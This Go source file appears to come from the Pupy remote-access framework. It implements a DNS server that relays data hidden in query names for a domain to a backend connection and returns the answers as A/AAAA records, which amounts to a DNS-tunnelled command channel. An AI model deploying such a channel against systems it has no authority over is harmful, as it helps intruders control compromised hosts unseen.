pupy/services/proxy/dns.go

470 lines
9.3 KiB
Go

package main
import (
"fmt"
"net"
"strings"
"sync/atomic"
"time"
"errors"
dns "github.com/miekg/dns"
rc "github.com/paulbellamy/ratecounter"
log "github.com/sirupsen/logrus"
)
func (d *Daemon) serveDNS(conn net.Conn, domain string) error {
d.DNSCheck.Lock()
d.DNSListener = NewDNSListener(conn, domain)
d.DNSCheck.Unlock()
log.Debug("DNS: Enabled: ", domain)
err := d.DNSListener.Serve()
log.Debug("DNS: Disabled: ", domain, err)
d.DNSCheck.Lock()
d.DNSListener = nil
d.DNSCheck.Unlock()
return err
}
func (p *DNSListener) listenAndServeTCP(cherr chan error) {
err := p.TCPServer.ListenAndServe()
if err != nil {
log.Error("Couldn't start TCP DNS listener:", err)
}
cherr <- err
log.Debug("[1.] DNS TCP CLOSED")
}
func (p *DNSListener) listenAndServeUDP(cherr chan error) {
err := p.UDPServer.ListenAndServe()
if err != nil {
log.Error("Couldn't start TCP DNS listener:", err)
}
cherr <- err
log.Debug("[2.] DNS UDP CLOSED")
}
func (p *DNSListener) messageReader(cherr chan error, chmsg chan []string) {
for {
var response []string
err := RecvMessage(p.Conn, &response)
if err != nil || response == nil {
log.Error("DNS: RecvMessage failed: ", err)
cherr <- err
break
} else {
r := atomic.AddInt32(&p.pendingRequests, -1)
if r == 0 {
p.Conn.SetDeadline(time.Time{})
}
chmsg <- response
}
}
close(chmsg)
log.Debug("[3.] REMOTE READER CLOSED")
}
func (p *DNSListener) responseProcessor(queue chan chan []string, recvStrings chan []string) {
for {
response := <-recvStrings
if response == nil {
break
}
rchan := <-queue
if rchan == nil {
break
}
rchan <- response
}
waitLoop:
for {
select {
case ignore := <-queue:
if ignore == nil {
break waitLoop
}
ignore <- []string{}
default:
break waitLoop
}
}
log.Debug("[5.] RESPONSE PROCESSOR CLOSED")
}
func (p *DNSListener) sendEmptyMessage() {
SendMessage(p.Conn, "")
}
func (p *DNSListener) queryProcessor(
queue chan chan []string,
interrupt <-chan bool, closeNotify chan<- bool, decoderr chan<- error) {
ignore := false
notifySent := false
for {
var (
err error
r *DNSRequest
)
r = nil
interrupted := false
log.Debug("DNS. Wait for interrupt or for close request")
select {
case r = <-p.DNSRequests:
case _ = <-interrupt:
interrupted = true
}
log.Debug("DNS. Wait done: ", r, ignore)
if r == nil || interrupted {
if interrupted {
log.Error("DNS: Interrupt request received", notifySent)
}
if !notifySent {
log.Debug("Send close notify")
closeNotify <- true
notifySent = true
close(closeNotify)
}
log.Debug("Ignore 1")
ignore = true
}
if ignore {
if r != nil {
r.IPs <- []string{}
continue
} else {
break
}
}
p.Conn.SetDeadline(time.Now().Add(20 * time.Second))
err = SendMessage(p.Conn, r.Type+":"+r.Name)
if err != nil {
log.Error("DNS: Send message failed: ", err)
r.IPs <- []string{}
decoderr <- err
ignore = true
continue
} else {
if atomic.AddInt32(&p.pendingRequests, 1) > 512 {
r.IPs <- []string{}
decoderr <- errors.New("Too many pending requests")
ignore = true
continue
} else {
queue <- r.IPs
}
}
}
waitLoop:
for {
select {
case r := <-p.DNSRequests:
if r != nil {
r.IPs <- []string{}
}
default:
break waitLoop
}
}
log.Debug("[4.] Message processor closed")
}
func warnSlow(message string, now time.Time, max time.Duration) {
current := time.Now()
barrier := now.Add(max)
diff := current.Sub(now).Seconds()
if barrier.Before(current) {
log.Warning(fmt.Sprintf("%s: %.2fs", message, diff))
}
}
func (p *DNSListener) ServeDNS(w dns.ResponseWriter, r *dns.Msg) {
m := new(dns.Msg)
m.SetReply(r)
m.Compress = true
m.Authoritative = false
processed := true
now := time.Now()
result := make(chan []string)
p.dnsRequestsCounter.Incr(1)
defer p.dnsProcessedRequestsCounter.Incr(1)
p.processedRequests.Add(1)
defer p.processedRequests.Done()
defer close(result)
p.cacheLock.Lock()
for k, v := range p.DNSCache {
if v.LastActivity.Add(1 * time.Minute).Before(now) {
log.Debug("Delete cache: ", k)
delete(p.DNSCache, k)
}
}
p.cacheLock.Unlock()
if len(r.Question) > 0 {
for _, q := range r.Question {
question := q.Name[:]
if q.Name[len(q.Name)-1] == '.' {
question = q.Name[:len(q.Name)-1]
}
payloadLen := len(question) - len(p.Domain) - 1
if payloadLen <= 0 {
payloadLen = 0
}
qtype := dns.Type(q.Qtype).String()
log.Debug("DNS: Request: ", qtype, " ", q.Name)
record := &DNSCacheRecord{}
ok := true
cacheKey := ""
if q.Qtype == dns.TypeA || q.Qtype == dns.TypeAAAA {
cacheKey = qtype + ":" + q.Name
p.cacheLock.Lock()
record, ok = p.DNSCache[cacheKey]
p.cacheLock.Unlock()
}
if !ok {
log.Info("DNS: Request: ", q.Name, " not in cache; PL: ", payloadLen)
responses := []string{}
if strings.HasSuffix(question, p.Domain) {
if p.active {
p.dnsRemoteRequestsCounter.Incr(1)
if payloadLen <= len(question) {
question = question[:payloadLen]
now2 := time.Now()
p.DNSRequests <- &DNSRequest{
Name: question,
Type: qtype,
IPs: result,
}
log.Debug("DNS: Send request: ", question)
responses = <-result
log.Info("DNS: Response: ", question, ": ", responses)
warnSlow(fmt.Sprintf(
"DNS: Slow RR communication: (Rates: Remote=%dps Total=%dps Processed=%dps)",
p.dnsRemoteRequestsCounter.Rate()/10,
p.dnsRequestsCounter.Rate()/10,
p.dnsProcessedRequestsCounter.Rate()/10,
), now2, 1*time.Second)
}
}
if len(responses) > 0 {
dnsResponses := make([]dns.RR, len(responses))
for i, response := range responses {
header := dns.RR_Header{
Name: q.Name,
Rrtype: q.Qtype,
Class: dns.ClassINET,
Ttl: 60,
}
switch q.Qtype {
case dns.TypeA:
dnsResponses[i] = &dns.A{
Hdr: header,
A: net.ParseIP(response).To4(),
}
case dns.TypeAAAA:
dnsResponses[i] = &dns.AAAA{
Hdr: header,
AAAA: net.ParseIP(response).To16(),
}
}
}
record = &DNSCacheRecord{
ResponseRecords: dnsResponses,
}
p.cacheLock.Lock()
p.DNSCache[cacheKey] = record
p.cacheLock.Unlock()
} else {
processed = false
}
} else {
processed = false
}
}
if processed {
for _, rr := range record.ResponseRecords {
m.Answer = append(m.Answer, rr)
}
record.LastActivity = now
}
}
}
w.WriteMsg(m)
}
func NewDNSListener(conn net.Conn, domain string) *DNSListener {
listener := &DNSListener{
Conn: conn,
Domain: domain,
DNSCache: make(map[string]*DNSCacheRecord),
UDPServer: &dns.Server{
Addr: fmt.Sprintf("%s:%d", ExternalBindHost, DnsBindPort),
Net: "udp",
UDPSize: int(UDPSize),
},
TCPServer: &dns.Server{
Addr: fmt.Sprintf("%s:%d", ExternalBindHost, DnsBindPort),
Net: "tcp",
},
DNSRequests: make(chan *DNSRequest),
dnsRequestsCounter: rc.NewRateCounter(10 * time.Second),
dnsRemoteRequestsCounter: rc.NewRateCounter(10 * time.Second),
dnsProcessedRequestsCounter: rc.NewRateCounter(10 * time.Second),
active: true,
}
listener.UDPServer.Handler = listener
listener.TCPServer.Handler = listener
return listener
}
func (p *DNSListener) Serve() error {
/* Add error handling */
tcperr := make(chan error)
udperr := make(chan error)
decoderr := make(chan error)
recvStrings := make(chan []string)
recvErrors := make(chan error)
closeNotify := make(chan bool)
interruptNotify := make(chan bool)
responsesQueue := make(chan chan []string, 512)
defer close(tcperr)
defer close(udperr)
defer close(decoderr)
defer close(recvErrors)
defer close(responsesQueue)
go p.listenAndServeTCP(tcperr)
go p.listenAndServeUDP(udperr)
go p.messageReader(recvErrors, recvStrings)
go p.queryProcessor(responsesQueue, interruptNotify, closeNotify, decoderr)
go p.responseProcessor(responsesQueue, recvStrings)
var err error
tcpClosed := false
udpClosed := false
decoderClosed := false
msgsClosed := false
shutdown := false
for !(tcpClosed && udpClosed && decoderClosed && msgsClosed) {
var err2 error
select {
case err2 = <-tcperr:
log.Println("Recv tcpClosed")
tcpClosed = true
case err2 = <-udperr:
log.Println("Recv udpClosed")
udpClosed = true
case err2 = <-decoderr:
log.Println("Recv decoderClosed")
case err2 = <-recvErrors:
log.Println("Recv msgsClosed")
msgsClosed = true
close(interruptNotify)
case <-closeNotify:
log.Println("Recv decoderClosed")
shutdown = true
decoderClosed = true
}
log.Debug("Call closed")
p.Shutdown()
log.Debug("Call closed complete")
if err == nil {
err = err2
}
log.Debug("CLOSED: ", tcpClosed, udpClosed, decoderClosed, msgsClosed, shutdown)
}
log.Debug("Wait process group complete")
p.processedRequests.Wait()
log.Debug("Wait process group complete - done")
close(p.DNSRequests)
p.DNSRequests = nil
return err
}
func (p *DNSListener) Shutdown() {
p.activeLock.Lock()
if p.active {
p.active = false
p.UDPServer.Shutdown()
p.TCPServer.Shutdown()
p.Conn.Close()
log.Debug("CLOSING DNS REQUESTS")
log.Debug("DNS REQUESTS CLOSED")
}
p.activeLock.Unlock()
}